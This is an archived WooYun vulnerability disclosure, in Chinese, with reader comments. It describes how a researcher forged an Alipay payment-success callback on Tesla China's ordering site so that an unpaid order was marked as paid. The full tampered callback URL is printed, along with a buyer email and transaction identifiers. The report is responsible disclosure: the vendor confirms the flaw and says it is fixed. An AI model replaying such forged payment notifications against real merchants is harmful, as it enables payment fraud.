当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0146510

漏洞标题:我是如何1元再购特斯拉的

相关厂商:特斯拉汽车

漏洞作者: 锄禾哥

提交时间:2015-10-13 20:15

修复时间:2015-11-30 14:36

公开时间:2015-11-30 14:36

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-13: 细节已通知厂商并且等待厂商处理中
2015-10-16: 厂商已经确认,细节仅向厂商公开
2015-10-26: 细节向核心白帽子及相关领域专家公开
2015-11-05: 细节向普通白帽子公开
2015-11-15: 细节向实习白帽子公开
2015-11-30: 细节向公众公开

简要描述:

锄禾哥今年股票5000点及时逃顶,赚来的钱没地方花,思来想去,买部特斯拉吧
职业病,忍不住,下单一定要试试有什么漏洞没。
特斯拉不是出新款了吗?锄禾哥就再来一台。

详细说明:

锄禾哥今年股票5000点及时逃顶,赚来的钱没地方花,思来想去,买部特斯拉吧
职业病,忍不住,下单一定要试试有什么漏洞没。
试了一个多星期,啥漏洞也没,突然被告知,特斯拉突然涨价5%!!白白又要多出5万!
我勒个去……简直就是犯贱啊。那就下单吧。
经历了一个星期的等待后,订单确认了,被告知要付第二笔25万的款项。
先来付个一万。
这不正好国庆了嘛,提车专员一直啪啦啪啦说要付完,可俺大支付宝一天只能付一万,真的是捉急,每天付了这一万特斯拉,支付宝又被限额买不了东西了。
回来了以后,本想去柜台存钱,想着,要不再来试试吧。
根据上次提走的那1元特斯拉,知道付款的漏洞是被修复了,那么我试试支付宝的通知回调接口吧。
首先,生成一个十三万的订单,记录下RN号
然后修改支付成功的通知回调接口
http://my.tesla.cn/alipayreturnfp?body=Model+S&buyer_email=zhaoyue%40aijoy.net&buyer_id=2088311949415681&exterface=create_direct_pay_by_user&extra_common_param=6dchu9miajons9spqjufjie643&is_success=T&notify_id=RqPnCoPT3K9%252Fvwbh3InVam4xme%252B9DwHRJxOFelUF1eRvMkXXYfg5oUb6Qw300wMz7swL&notify_time=2015-10-07+23%3A52%3A00&notify_type=trade_status_sync&out_trade_no=[支付RN号]&payment_type=1&seller_email=chinafinancesz%40teslamotors.com&seller_id=2088611024475284&subject=Tesla&total_fee=132000.00&trade_no=2015100721001004280023329978&trade_status=TRADE_SUCCESS&sign=8a920df1e7fd9b104e2c61903380c775&sign_type=MD5
页面显示支付成功了!卧槽!赚大发了!
现实是残酷的,回到页面一看,结果还是没成功,就是个假显示,不死心,我相信美帝一定对咱内陆接口玩不转,我再试试。修改一下trade_no支付宝的订单ID

tesla2.png


咦,妈妈再也不用担心我支付宝被限额了!

tesla.png

漏洞证明:

tesla2.png


tesla.png

修复方案:

1.重新请求trade_no状态和RN金额匹配。
2.严格验证支付宝回调SIGN
3.是否送台车让我再研究研究?哈哈

版权声明:转载请注明来源 锄禾哥@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-10-16 14:35

厂商回复:

此漏洞令在线订购的网页以为已经收到支付宝的款项,但是实际并未到账。主要是我们代码的漏洞,已经修补。谢谢锄禾哥发现漏洞,希望锄禾哥订的车早点交付,开得满意。

最新状态:

暂无

漏洞评价:

评论

  1. 2015-10-13 20:16 | 日出东方 ( 普通白帽子 | Rank:390 漏洞数:122 )

    表哥,厉害

  2. 2015-10-13 20:18 | Drizzle.Risk ( 普通白帽子 | Rank:265 漏洞数:20 | You have an error in your SQL syntax; ch...)

    哈哈,这次要不?

  3. 2015-10-13 20:32 | sqlfeng ( 普通白帽子 | Rank:198 漏洞数:34 | 不会弹吉它的黑客不是好歌手)

    baqi

  4. 2015-10-13 20:35 | zeracker 认证白帽子 ( 核心白帽子 | Rank:1077 漏洞数:139 | 多乌云、多机会!微信公众号: id:a301zls ...)

    牛比。

  5. 2015-10-13 20:49 | 机器猫 ( 普通白帽子 | Rank:1230 漏洞数:261 | 爱生活、爱腾讯、爱网络!)

    ccav看这里

  6. 2015-10-13 20:49 | ( 路人 | Rank:0 漏洞数:1 | 早日脱离路人)

    niubility

  7. 2015-10-13 21:03 | 番茄师傅 ( 普通白帽子 | Rank:298 漏洞数:85 | http://www.tomatoyu.com/)

    niubility

  8. 2015-10-13 21:27 | M4sk ( 普通白帽子 | Rank:1218 漏洞数:322 | 国内信息安全任重而道远,还需要厂商和白帽...)

    niubility

  9. 2015-10-13 21:33 | Nicky ( 普通白帽子 | Rank:493 漏洞数:71 | http://www.droidsec.cn 安卓安全中文站)

    这个提交TESLA官方是几千美金吧?

  10. 2015-10-13 21:55 | 番茄师傅 ( 普通白帽子 | Rank:298 漏洞数:85 | http://www.tomatoyu.com/)

    @Nicky 上次是一顶帽子 你想多了

  11. 2015-10-13 22:05 | niliu 认证白帽子 ( 核心白帽子 | Rank:1542 漏洞数:208 | 逆流而上)

    赚钱没地花 买部特斯拉

  12. 2015-10-13 23:12 | 锄禾哥 ( 普通白帽子 | Rank:106 漏洞数:19 | <script>alert('我没帽子')</script>)

    @Nicky 还有这种事?哈哈不知道啊 我靠亏了

  13. 2015-10-13 23:18 | 猪猪侠 认证白帽子 ( 核心白帽子 | Rank:3650 漏洞数:282 | 你都有那么多超级棒棒糖了,还要自由干吗?)

    难怪我们找不到特斯拉的问题,得买得起特斯拉,才有资格做测试,╮(╯▽╰)╭

  14. 2015-10-13 23:18 | _Thorns ( 普通白帽子 | Rank:1202 漏洞数:197 | WooYun is the Bigest gay place :))

    又要换车开啦,哈哈。

  15. 2015-10-13 23:35 | 子非海绵宝宝 认证白帽子 ( 核心白帽子 | Rank:1234 漏洞数:122 | 发扬海绵宝宝的精神!你不是海绵宝宝,你怎...)

    这是要发啊

  16. 2015-10-14 00:14 | 毕月乌 ( 普通白帽子 | Rank:120 漏洞数:16 | 猜猜我是谁?)

    难怪我们找不到特斯拉的问题,得买得起特斯拉,才有资格做测试,╮(╯▽╰)╭

  17. 2015-10-14 08:21 | 小龙 ( 普通白帽子 | Rank:1302 漏洞数:329 | 乌云有着这么一群人,在乌云学技术,去某数...)

    锄禾哥好叼!特斯拉妹纸又要打电话给你咯(ง •̀_•́)ง

  18. 2015-10-14 08:33 | 大师兄 ( 路人 | Rank:14 漏洞数:6 | 每日必关注乌云)

    夹紧

  19. 2015-10-14 09:01 | 白非白 ( 普通白帽子 | Rank:455 漏洞数:62 | ♫ Freedom - Anthony Hamilton ♫)

    一大波端午妹子即将来袭。。

  20. 2015-10-14 09:01 | 白非白 ( 普通白帽子 | Rank:455 漏洞数:62 | ♫ Freedom - Anthony Hamilton ♫)

    一大波当午妹子即将来袭。。。。。

  21. 2015-10-14 09:16 | xmit0s5 ( 实习白帽子 | Rank:50 漏洞数:4 | %00)

    一大波当午妹子即将来袭。。。。。

  22. 2015-10-14 15:04 | 随风的风 ( 普通白帽子 | Rank:170 漏洞数:55 | 微信公众号:233sec 不定期分享各种漏洞思...)

    一大波当午妹子即将来袭。

  23. 2015-10-16 14:36 | 牛 小 帅 ( 普通白帽子 | Rank:521 漏洞数:125 | 茶凉了,就不要再续了,再续也不是原来的味...)

    希望锄禾哥订的车早点交付,开得满意。

  24. 2015-10-16 14:38 | Manning ( 普通白帽子 | Rank:739 漏洞数:99 | https://github.com/manning23/MSpider)

    希望锄禾哥订的车早点交付,开得满意。

  25. 2015-10-16 14:41 | _Thorns ( 普通白帽子 | Rank:1202 漏洞数:197 | WooYun is the Bigest gay place :))

    希望锄禾哥订的车早点交付,开得满意。

  26. 2015-10-16 14:49 | zeracker 认证白帽子 ( 核心白帽子 | Rank:1077 漏洞数:139 | 多乌云、多机会!微信公众号: id:a301zls ...)

    目测只需要 结算余款就能交付了。。。

  27. 2015-10-16 15:24 | 毕月乌 ( 普通白帽子 | Rank:120 漏洞数:16 | 猜猜我是谁?)

    希望锄禾哥订的车早点交付,开得满意。

  28. 2015-10-16 15:32 | 疯子 ( 普通白帽子 | Rank:242 漏洞数:42 | 世人笑我太疯癫,我笑世人看不穿~)

    希望锄禾哥订的车早点交付,开得满意。

  29. 2015-10-17 01:06 | 一只猿 ( 普通白帽子 | Rank:494 漏洞数:92 | 硬件与无线通信研究方向)

    希望锄禾哥订的车早点交付,开得满意。

  30. 2015-10-20 09:42 | 无面者 ( 路人 | Rank:4 漏洞数:5 | I'm a new man in security area.)

    上次特斯拉发的限量礼物一份,不会是特斯拉把客服妹子快递给你了吧。。

  31. 2015-11-30 14:39 | hack_lan ( 路人 | Rank:12 漏洞数:5 | 爱好linux开源架构,安全,python)

    我就想知道,前面的那部分钱是不是不用出了,然后付清后面的就行了?

  32. 2015-11-30 14:41 | 刘海哥 ( 普通白帽子 | Rank:114 漏洞数:28 | 索要联系方式但不送礼物的厂商定义为无良厂...)

    赵越是黑客?